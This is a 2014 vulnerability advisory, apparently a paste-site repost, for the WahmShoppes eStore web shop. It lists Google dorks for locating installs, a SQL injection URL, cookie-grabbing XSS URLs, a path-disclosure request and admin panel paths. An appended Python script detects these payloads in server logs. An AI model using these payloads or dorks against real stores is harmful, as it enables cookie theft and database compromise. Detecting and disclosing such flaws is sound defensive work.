Mayk0

WahmShoppes eStore Cross Site Scripting / SQL Injection

Jun 7th, 2014
Full title: WahmShoppes eStore Cross Site Scripting / SQL Injection Vulnerabilities
Date added: 2014-06-07
Category: web applications
Platform: php
Risk: [Security Risk Critical]
Description: WahmShoppes eStore suffers from cross site scripting, information disclosure, and remote SQL injection vulnerabilities.
===================================================

#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Title : Multiple Vulnerabilities in "WahmShoppes eStore"
# Author : alieye
# vendor : http://www.wahmshoppes.com/
# Contact : cseye_ut@yahoo.com
# Risk : High
# Class: Remote
# Google Dork:
# inurl:WsError.asp
# inurl:store/ We apologize but your request rendered no results
# Version: all versions
# Date: 05/06/2014
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++

1-Blind SQL Injection

http://victim.com/store/WsDefault.asp?One=-999 AND 1=1+UNION+SELECT+...etc
---------------------------------------------------------

2-Cross Site Scripting

http://victim.com/store/WsError.asp?msg=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://victim.com/store/WsRequestpwd.asp?msg=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
---------------------------------------------------------

3-Information Disclosure in image location

http://victim.com/store/thumb.asp?path=X:/server path and domain name/example.jpg
---------------------------------------------------------

4-Show admin panel tools

http://victim.com/store/frmLeft.asp
---------------------------------------------------------

Admin page

http://victim.com/store/admin/Default.asp

#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , andelos , 3.14nnph , f4rm4nd3 and all cseye members
[#] Thanks To All Iranian Hackers
[#] website : http://cseye.vcp.ir/
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
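As an added defender-side example (not part of the advisory above), the following Python flags web-server requests that match the four issues listed: a script tag in the msg parameter of WsError.asp / WsRequestpwd.asp, SQL keywords in the One parameter of WsDefault.asp, and an absolute drive path in the path parameter of thumb.asp. The IIS W3C-style field order, the sample log lines and the client IPs are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Pages and parameter names taken from the advisory; stems are compared lower-cased.
XSS_PAGES = {"/store/wserror.asp", "/store/wsrequestpwd.asp"}   # msg=
SQLI_PAGE = "/store/wsdefault.asp"                              # One=
DISCLOSURE_PAGE = "/store/thumb.asp"                            # path=

# Patterns applied to the URL-decoded parameter values.
SCRIPT_RE = re.compile(r"<\s*script|javascript:|onerror\s*=", re.I)
SQLI_RE = re.compile(r"\bunion\b.*\bselect\b|\band\s+\d+\s*=\s*\d+", re.I)
ABS_PATH_RE = re.compile(r"^[A-Za-z]:[/\\]|^\\\\")          # X:/... or UNC path

def parse_query(raw):
    # Split a cs-uri-query field into {lower-cased name: decoded value}.
    params = {}
    for pair in raw.split("&"):
        name, _, value = pair.partition("=")
        params[name.lower()] = unquote_plus(value)
    return params

def classify(line):
    # Assumed field order: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
    fields = line.split()
    if len(fields) < 7:
        return None
    stem, query = fields[4].lower(), fields[5]
    params = parse_query(query) if query != "-" else {}
    if stem in XSS_PAGES and SCRIPT_RE.search(params.get("msg", "")):
        return "xss"
    if stem == SQLI_PAGE and SQLI_RE.search(params.get("one", "")):
        return "sqli"
    if stem == DISCLOSURE_PAGE and ABS_PATH_RE.search(params.get("path", "")):
        return "path-disclosure"
    return None

# Constructed sample log (not real traffic); lines 1 and 4 are benign controls.
SAMPLE_LOG = """\
2014-06-07 10:00:01 203.0.113.5 GET /store/WsDefault.asp One=12 200
2014-06-07 10:00:02 203.0.113.5 GET /store/WsDefault.asp One=-999+AND+1=1+UNION+SELECT+1,2,3 500
2014-06-07 10:00:03 203.0.113.5 GET /store/WsError.asp msg=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E 200
2014-06-07 10:00:04 198.51.100.9 GET /store/WsError.asp msg=Item+not+found 200
2014-06-07 10:00:05 203.0.113.5 GET /store/thumb.asp path=X:/inetpub/shop/images/example.jpg 200
"""

def scan(log_text):
    # Return [(line_number, label)] for every line matching a known issue.
    labelled = ((n, classify(line)) for n, line in enumerate(log_text.splitlines(), 1))
    return [(n, label) for n, label in labelled if label]
```

Running scan(SAMPLE_LOG) reports lines 2, 3 and 5 as sqli, xss and path-disclosure respectively; the same checks belong on the server side as input validation and output encoding of msg.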